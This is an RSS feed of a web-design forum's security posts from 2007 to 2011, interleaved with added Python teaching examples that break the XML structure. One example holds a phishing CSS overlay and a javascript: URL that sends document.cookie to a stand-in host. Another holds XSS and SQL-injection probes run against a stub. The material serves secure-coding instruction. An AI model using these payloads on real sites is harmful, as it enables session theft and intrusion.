<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Webnetics UK Ltd. - Forums - Security]]></title>
		<link>https://www.webneticsuk.com/forum/</link>
		<description><![CDATA[Webnetics UK Ltd. - Forums - https://www.webneticsuk.com/forum]]></description>
		<pubDate>Thu, 09 Apr 2026 08:04:09 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Forum Etiquette and Common Sense]]></title>
			<link>https://www.webneticsuk.com/forum/showthread.php?tid=202</link>
			<pubDate>Sun, 27 Mar 2011 12:30:58 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.webneticsuk.com/forum/member.php?action=profile&uid=1">webnetics</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.webneticsuk.com/forum/showthread.php?tid=202</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Common rules</span><br />
<br />
1. Only one account per person is permitted.<br />
2. Do not pretend to be/represent somebody else. Your account will be deleted if found to be in breach of this rule.<br />
3. When registering, a valid email address has to be used. Disposable email addresses are not permitted. If found, we will remove the account in question.<br />
4. Keep all posts on-topic.<br />
5. All posts must be in English, unless posted in a specific international forum. If posting in an international forum, please use the language of that forum, and not English.<br />
6. DO NOT SEND SUPPORT REQUESTS VIA PM, unless expressly invited to do so. Using PM to actively solicit work is not allowed. Post, in accord with the rules in the correct forum. Abuse of the PM system in this way can lead to your membership being removed.<br />
7. Do not discuss illegal activities.<br />
8. No useless posts. This includes: Thread bumping, useless one liners, repeated requests about new versions, Flamewars, Trolling and Spamming.<br />
9. Do not propose/link to any site that contains warez/copyrighted software/materials that can be downloaded illegally.<br />
10. Do not link to any site that contains adult content, sexually oriented material or might otherwise be considered offensive. Any post containing an inappropriate link will be deleted and the poster will receive a warning.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">At all times</span><br />
<br />
1. Keep all commentary civil, and be courteous at all times. Constructive criticism is welcome, but insults directed towards other users or the site admins will not be tolerated. Coarse/insulting language will not be tolerated.<br />
2. Choose an appropriate subject line. Try to summarise the problem briefly in the subject, and elaborate in the message itself. A title like "Have you seen this..." or "Help needed!!!!" will be deleted.<br />
3. Spend 10 minutes with the admin panel before posting common sense questions like "How do I see orders", or "How do I add products". If you go through each admin menu you will find all you need to know about the basic features.<br />
4. Search before posting. You may need to search multiple variations of the terms.<br />
5. Any posts deemed to be self promotion, advertising, or spam can and will be removed. NO SPAM - NO ADVERTISING, e.g. posting and making excessive, inappropriate and unnecessary references to your products and websites is self promotion.<br />
6. Don't lump mods and inquiries together in one post. People asking for help and at the same time attaching a contribution should be avoided. Contributions go in the contrib thread. Help goes in one of the support threads, based on the affected element (modules, templates, languages, general, etc).<br />
7. Bugs go into the bug area ONLY after you have searched the bug forum and found nothing similar.<br />
8. Hijacking threads because you feel the need to whine or complain about your personal opinions that have nothing to do with the main topic of the thread will be instantly deleted at will!<br />
9. If you feel a post violates any of these rules, or you need to bring it to the attention of a moderator (move threads/close/split), please use the 'report this post' link to notify the moderators.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Signatures &amp; Avatars</span><br />
<br />
1. Must be set up in your Profile (User Control Panel), and not manually added to your messages.<br />
2. May not contain any pricing, sales, product etc. details.<br />
3. Only exact URLs are allowed, i.e. not 'LOOK HERE'. No tinyurls, affiliate links etc. either; only exact, literal URLs.<br />
4. Maximum font size should not be larger than normal +1.<br />
5. Signature shall not have more than 4 lines (at a line width of 75 chars).<br />
6. Any signature or avatar that is offensive or insulting to either us, our members, or our staff, is prohibited.<br />
7. Signature size should not exceed the maximum size of 60 x 180 px (height x width).<br />
8. Avatar size should not exceed the maximum size of 75 x 75 px (height x width).<br />
9. Signature &amp; Avatar images may not contain any copyright material (e.g. trademarks)<br />
10. We reserve the right to ask you to change and/or remove your signature or avatar at any time, for any reason.<br />
<br />
Failure to abide by these rules may result in editing, negative moderation or deletion of your post. <br />
We reserve the right to ban users from the site. <br />
We reserve the right to change these rules at any time.]]></description>
		</item>
		<item>
			<title><![CDATA[IE8 Testing]]></title>
			<link>https://www.webneticsuk.com/forum/showthread.php?tid=92</link>
			<pubDate>Sun, 01 Jun 2008 13:53:03 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.webneticsuk.com/forum/member.php?action=profile&uid=1">webnetics</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.webneticsuk.com/forum/showthread.php?tid=92</guid>
<description><![CDATA[We have just downloaded IE8, still in beta, for testing on our website. <br />
<br />
The changes Microsoft has implemented see the browser going standards crazy. In the past, this would have been good news, but coming from a world where the majority of people are using the distinctly quirky IE7, there's going to be a generous crossover period where developers just have another browser to check against.<br />
<br />
However, IE8 sounds a lot smarter. Top new features outside of the fabled Standards mode include 'Web Slices' and 'Activities'. The former is a kind of syndicated feed widget and the latter is a form of live contextual menuing for web pages. Both need a little work before they impress me.<br />
<br />
At first glance, the new Internet Explorer looks much the same as the previous version: the interfaces are almost identical. But explore a little further and you'll spot a few changes. For example, wave goodbye to the Phishing Filter and say hello to the Safety Filter, which also protects you from sites that are known to host malware.<br />
<br />
The Address bar features something called 'domain highlighting'. This displays the top-level domain name in a bold, black font while the rest of the URL appears in grey. Presumably, the idea is to help you figure out where you are if you've followed a link to some intentionally misleading URL. Sounds reasonable, although if you've clicked on a spam link and IE8's Safety Filter hasn't blocked the page then it may already be too late.<br />
<br />
Elsewhere, the Manage Add-ons dialog has been revamped. There's no doubt it looks prettier, but we see no real improvements in functionality; perhaps they're being saved for a future beta.<br />
<br />
Technical improvements include the ability to restrict ActiveX controls to one particular site, which is handy as it limits possible exploits by hackers. And the current Data Execution Prevention (DEP) option is enabled by default. This means code cannot be run in memory that's marked as non-executable, making it more difficult to attack the browser through a buffer overrun.<br />
<br />
There are some small, incremental security gains in IE8 beta 1, then, but nothing dramatic; no killer feature that's likely to restore the faith of IE doubters. It's early days, though: the final version isn't likely to be out until the end of the year, so there's time for Microsoft to deliver. <br />
<br />
<span style="font-weight: bold;" class="mycode_b">A quick tour of the new browser</span><br />
<br />
1 The IE8 right-click menu now includes many Activities that you can apply to a page, perhaps automatically translating text or mapping an address.<br />
<br />
2 WebSlices enables you to subscribe to content from within a web page: an eBay item, for instance. You can monitor any updates on your Favourites bar.<br />
<br />
3 Improved reliability means it's far harder to make IE8 crash (no, really). And even if the worst happens, IE8 will restore your open Tabs when it restarts.<br />
<br />
4 And let's not forget perhaps the biggest step forward of all: the much improved standards support that sees IE8 finally pass the Acid2 test. Well, almost.]]></description>
		</item>
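The domain-highlighting paragraph above rests on one fact: the part of a URL the browser actually connects to is the host, and a misleading link puts a familiar name somewhere else in the URL. The following Python script is an added example, not code from the forum post or from Microsoft; it uses the standard library's URL parser on a set of constructed links (the domains bank.example, evil.test and login-verify.test are not real) to show where the real host ends up. The "registrable domain" here is simply the last two labels of the host, which is an assumption made for the example; real browsers consult the Public Suffix List to handle hosts such as example.co.uk.

```python
# Added example (not from the forum post): how the host part of a URL, the part
# IE8's domain highlighting emphasises, differs from what a casual reader sees.
# All URLs below are constructed for illustration; the domains are not real.
from urllib.parse import urlsplit


def registrable_domain(url):
    """Return (hostname, naive registrable domain) for a URL.

    The registrable domain is taken as the last two host labels. That is an
    assumption for this example; a browser uses the Public Suffix List.
    """
    host = urlsplit(url).hostname or ""
    labels = host.split(".")
    site = ".".join(labels[-2:]) if len(labels) >= 2 else host
    return host, site


def looks_like_but_is_not(url, brand_domain):
    """True when the URL mentions brand_domain but is not served by it."""
    host, site = registrable_domain(url)
    mentioned = brand_domain in url
    served_by = site == brand_domain or host.endswith("." + brand_domain)
    return mentioned and not served_by


# Constructed deceptive links: each contains 'bank.example' yet is served elsewhere.
DECEPTIVE = [
    "http://bank.example.login-verify.test/account",  # brand as attacker's subdomain
    "http://bank.example@evil.test/account",          # brand in the userinfo part
    "http://evil.test/bank.example/login",            # brand in the path
    "http://bank.example.evil.test:8080/",            # brand plus a port
]
GENUINE = [
    "https://bank.example/account",
    "https://www.bank.example/login",
]

if __name__ == "__main__":
    for u in DECEPTIVE + GENUINE:
        host, site = registrable_domain(u)
        flag = "DECEPTIVE" if looks_like_but_is_not(u, "bank.example") else "ok"
        print(f"{flag:9} host={host!r:34} site={site!r:20} {u}")
```

The userinfo case is the one worth remembering: everything before the `@` is ignored by the browser when it chooses a host, so a link can read "bank.example" for its first twenty characters and still land on evil.test. Highlighting the host is a defence that works only if the user looks at it, which is the caveat the post itself raises.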
		<item>
			<title><![CDATA[Vital for web developers to know about security threats]]></title>
			<link>https://www.webneticsuk.com/forum/showthread.php?tid=26</link>
			<pubDate>Wed, 09 Jan 2008 14:42:08 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.webneticsuk.com/forum/member.php?action=profile&uid=1">webnetics</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.webneticsuk.com/forum/showthread.php?tid=26</guid>
<description><![CDATA[The popularity of social networking sites seems ever-increasing. In just one year, Facebook has grown by 270 per cent and now boasts over 52 million users worldwide. This zeal for all things interactive has seeped into the online community's consciousness and, as a result, organisations and businesses are clamouring to implement their own Web 2.0 functionality.<br />
<br />
While such an increase in web traffic is a boon for the industry, it does have its downsides. Interactive sites use open source Ajax coding, which gives malware writers considerably more points of entry than traditional HTML coding. The problem is further exacerbated when web developers don't possess enough security knowledge to deal with new advances in the industry, and unwittingly leave sites, and the end user, open to attack.<br />
<br />
So what threats are web developers now facing? As mentioned, Ajax is a key cause of increased security breaches on the web. A traditional web application can be compared to a house with just one front door and no windows, in that it offers only one point of attack. On the other hand, an Ajax application constantly exchanges small amounts of data between the browser and the server, which creates many points of input. The inputs provide more opportunities for attack; as well as the front door, the house has numerous windows, all providing a break-and-entry point.<br />
<br />
Of course, it's this open source technology that enables the interactive functions on a website to exist, and it would be ridiculous to suggest erasing such functions to retain a secure website. Instead, the security industry must share its knowledge with web developers so that precautions are taken to prevent Ajax-based sites being hijacked.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Targeting Web 2.0 sites</span><br />
<br />
Web 2.0 technology has exploded so fast that it has been impossible for the IT industry to keep up. Right now, 71 per cent of UK office workers aged 28-29 access Web 2.0 internet sites at least a few times a week, and it's these sites that have gained the most popularity with phishers and hackers. In March 2007, for example, Google's Online Security blog noted that the number of page views generated on phishing sites increased fivefold, with 95 per cent targeting MySpace. Holes in security mean that sites such as MySpace have turned into goldmines: the injection of simple CSS code into a profile is all it takes to infect the page, so that wherever a user clicks, even on what appears to be a legitimate link, they're redirected to a phishing page.<br />
<br />
Many users have the same login credentials for social networking accounts as they do for banks and web-based mail. This creates a domino effect and enables a user's online identity to be fully compromised. If web developers are unaware of how to prevent such security breaches, the web will grow increasingly unsafe and, as a result, the positive aspects of the Web 2.0 revolution will be seriously undermined.<br />
<br />
One successful hacker, Lithium, has been quoted as saying: "Lazy web developers are the reason I'm still around phishing." However, the blame cannot be laid solely at the door of web developers. On the contrary, it's the training they receive that's a major part of the problem. It seems that the provision of security training varies from course to course, with some teaching very little on the subject at all. Web development courses should teach would-be developers that the key to ensuring consumer confidence in the web is to make a site as invulnerable as possible from its conception. To do this, developers should make sure that all input is sanitised and all points of input are as secure as possible. Up-to-date advice on security best practice, technical documentation and free, secure source code can be found at the Open Web Application Security Project (owasp.org).<br />
<br />
Within the next year, it's likely that the IT community will see more incidents of Ajax-borne threats, which should hopefully be enough to raise developers' awareness of this issue.]]></description>
		</item>
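The post above describes the MySpace-style attack (a profile field that carries markup which covers the page with a link to a phishing site) and prescribes the fix in one sentence: sanitise all input and secure every input point. The Python below is an added example, not code from the post or from any site it names, and shows what that means for one Ajax profile endpoint with two input points, written first the careless way and then hardened. The field names, the payload and the host phish.test are constructed for the example. Angle brackets are spelled as \u003c and \u003e escapes in the string literals; Python turns them into the real characters, so the payload is genuine markup at run time.

```python
# Added example (not from the forum post): one Ajax "profile fragment" endpoint
# written twice, the way the post warns against and the hardened way. Field
# names, the payload and the phish.test host are constructed for illustration.
import html
import re
from urllib.parse import urlsplit

# Markup template the endpoint returns to the page's Ajax caller. Angle brackets
# are written as \u003c / \u003e escapes; Python decodes them at load time.
FRAGMENT = (
    "\u003cp class=\"about\"\u003e{about}\u003c/p\u003e"
    "\u003ca href=\"{site}\"\u003ewebsite\u003c/a\u003e"
)

# Constructed attacker-controlled profile fields.
# about_me: a style block that stretches every link over the whole page, plus a
# link to the phishing login, so any click goes to phish.test.
PAYLOAD_ABOUT = (
    "\u003cstyle\u003ea{position:fixed;top:0;left:0;width:100%;height:100%}"
    "\u003c/style\u003e"
    "\u003ca href=\"http://phish.test/login\"\u003eprofile\u003c/a\u003e"
)
# website: a javascript: URL that ships the session cookie when clicked.
PAYLOAD_SITE = "javascript:location='http://phish.test/?c='+document.cookie"

# Allowlist for the 'website' field: http(s) scheme and a plain hostname.
# A real deployment would also cap the length. This regex is an assumption
# made for the example, not a complete hostname grammar.
HOST_RE = re.compile(r"^[a-z0-9.-]+$", re.IGNORECASE)


def render_profile_vulnerable(about_me, website):
    """What a hurried handler does: drop user input straight into the fragment.

    Both payloads survive intact: the overlay and phishing link from about_me,
    and a clickable javascript: URL from website.
    """
    return FRAGMENT.format(about=about_me, site=website)


def validate_website(website):
    """Return the URL if it is a plain http(s) link to a hostname, else None."""
    candidate = website.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ("http", "https"):
        return None
    if not parts.hostname or not HOST_RE.match(parts.hostname):
        return None
    return candidate


def render_profile_hardened(about_me, website):
    """Validate the field that has a grammar, escape everything on the way out.

    about_me is free text, so it cannot be validated into safety; it is escaped
    with html.escape so the browser shows the markup rather than running it.
    website has a grammar (an http(s) URL), so it is checked against an
    allowlist first and replaced by '#' when it fails.
    """
    safe_site = validate_website(website)
    return FRAGMENT.format(
        about=html.escape(about_me, quote=True),
        site=html.escape(safe_site, quote=True) if safe_site else "#",
    )


if __name__ == "__main__":
    print("vulnerable:", render_profile_vulnerable(PAYLOAD_ABOUT, PAYLOAD_SITE))
    print("hardened:  ", render_profile_hardened(PAYLOAD_ABOUT, PAYLOAD_SITE))
```

Two points the code makes that the post's one sentence does not: free text such as about_me cannot be made safe by input filtering alone, because the dangerous characters are legitimate content, so the escaping has to happen where the text is written into markup; and a field that does have a grammar, such as a URL, is best handled by an allowlist on the scheme and host rather than by blocking known-bad strings like "javascript:".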
		<item>
			<title><![CDATA[Secure Web Applications]]></title>
			<link>https://www.webneticsuk.com/forum/showthread.php?tid=6</link>
			<pubDate>Mon, 26 Nov 2007 20:48:41 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.webneticsuk.com/forum/member.php?action=profile&uid=1">webnetics</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.webneticsuk.com/forum/showthread.php?tid=6</guid>
			<description><![CDATA[Writing secure web applications is a difficult business. You can assemble a team of the best developers, put their work through the most intensive testing, and bugs and vulnerabilities will still be uncovered later. If you're responsible for a complex site with custom PHP applications, say, then that's a real worry. So how can you ever get an accurate feel for your site's security?<br />
<br />
Perhaps the best answer is to find yourself a web vulnerability scanner. This is a program that will look at your site and its structure, analyse any applications and check for cross-site scripting, SQL injection and potential vulnerabilities. These tools can't offer a 100 per cent guarantee, as they're looking for known security holes and exploits: your site may come up clean and still be vulnerable to a new hacking technique that's discovered next week. This isn't likely, though, and at least in the meantime you can be sure that your set-up has been tested to a known standard.<br />
<br />
These are powerful applications, but there's a price to pay for it. The Acunetix Web Vulnerability Scanner, for instance, is an excellent tool that can analyse JavaScript, Flash content, Soap and Ajax, as well as run through some very in-depth cross-site scripting and SQL injection tests. It quickly indexes even the largest sites, and produces reports that clearly point out the problems, even if you're not a developer. But to buy a licence to check just one site will cost you about £750, and if you want to scan any site, the price leaps to £3,750.<br />
<br />
Are these prices really worth paying? For large companies, yes. Tasking someone to manually audit a site once would cost more than £750. And if you're a consultant who offers security advice to companies, then the ability to include accurate vulnerability reports should help you earn more than enough new business to pay for the software.<br />
<br />
However, there are cheaper alternatives. Gamasec offers marginally less detailed testing for a much lower price (from £100 per scan on a pay-as-you-go basis). <br />
<br />
Online scanning services such as AlertSite can save you money, and include free trials. There's a free version of the Acunetix scanner that checks only for cross-site scripting problems, and there's the classic open source Nessus, which works best on Unix (<a href="http://www.nessus.org" target="_blank" rel="noopener" class="mycode_url">www.nessus.org</a>).]]></description>
		</item>
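The post above says what a web vulnerability scanner does (walk the site, feed each input known probes, report cross-site scripting and SQL injection) and why a clean result is not a guarantee (it only finds what its probes are built to find). The Python below is an added example, not code from Acunetix, Gamasec, AlertSite, Nessus or the post, and reduces that core loop to one file: for each request parameter it substitutes a reflection marker and a lone quote, then looks for the two classic signals, the marker coming back unescaped and a database error message. The target is a constructed in-process stub with one hole per endpoint, so everything runs offline; the error-message patterns are the well-known MySQL, PostgreSQL, SQL Server and SQLite phrasings, and the marker text is an arbitrary choice for this example.

```python
# Added example (not from the forum post): the probe-and-inspect loop at the
# heart of a web vulnerability scanner, run against a constructed stub target.
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Reflection marker with no meaning to the target; angle brackets written as
# \u003c / \u003e escapes. If it comes back verbatim, the page did not escape it.
XSS_PROBE = "\u003cwvs7\u003e"
# A lone quote breaks a string literal in a query built by concatenation.
SQLI_PROBE = "'"
# Error strings from common database engines (MySQL, PostgreSQL, SQL Server,
# SQLite). A real scanner carries a much longer list.
SQL_ERROR_RE = re.compile(
    r"(you have an error in your sql syntax"
    r"|unterminated quoted string"
    r"|unclosed quotation mark"
    r"|sqlite3\.operationalerror)",
    re.IGNORECASE,
)


def stub_app(url):
    """Constructed target standing in for a real site: two holes, one safe page."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path == "/search":
        # Reflects the search term without escaping it.
        return "Results for " + q.get("q", "")
    if parts.path == "/item":
        # Pretends to run: SELECT * FROM items WHERE id='...' by concatenation,
        # so a quote in the id produces the database's syntax error.
        item_id = q.get("id", "")
        if "'" in item_id:
            return "Error: You have an error in your SQL syntax near ''"
        return "Item " + html.escape(item_id)
    if parts.path == "/profile":
        # Escapes on output; nothing to find here.
        return "Hello " + html.escape(q.get("name", ""))
    return "not found"


def scan(fetch, base, path, params):
    """Probe each parameter of one request; return [(param, finding), ...].

    fetch is a callable taking a URL and returning the response body, so the
    same loop works against the stub here or a real HTTP client.
    """
    findings = []
    for name in params:
        for probe, kind in ((XSS_PROBE, "reflected-xss"), (SQLI_PROBE, "sql-error")):
            mutated = dict(params)
            mutated[name] = probe
            body = fetch(base + path + "?" + urlencode(mutated))
            if kind == "reflected-xss" and probe in body:
                findings.append((name, kind))
            if kind == "sql-error" and SQL_ERROR_RE.search(body):
                findings.append((name, kind))
    return findings


if __name__ == "__main__":
    base = "http://target.test"   # constructed host; never contacted
    for path, params in (("/search", {"q": "shoes"}),
                         ("/item", {"id": "42"}),
                         ("/profile", {"name": "bob"})):
        print(path, scan(stub_app, base, path, params) or "clean")
```

The /profile page comes back clean not because it is secure in every respect but because neither probe provokes a visible symptom, which is the post's caveat made concrete: a scanner reports what its probes can see. Commercial tools add crawling, form and cookie handling, JSON request bodies, and time-based checks for injection that produces no error text, and that is the gap between this loop and a product.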
	</channel>
</rss>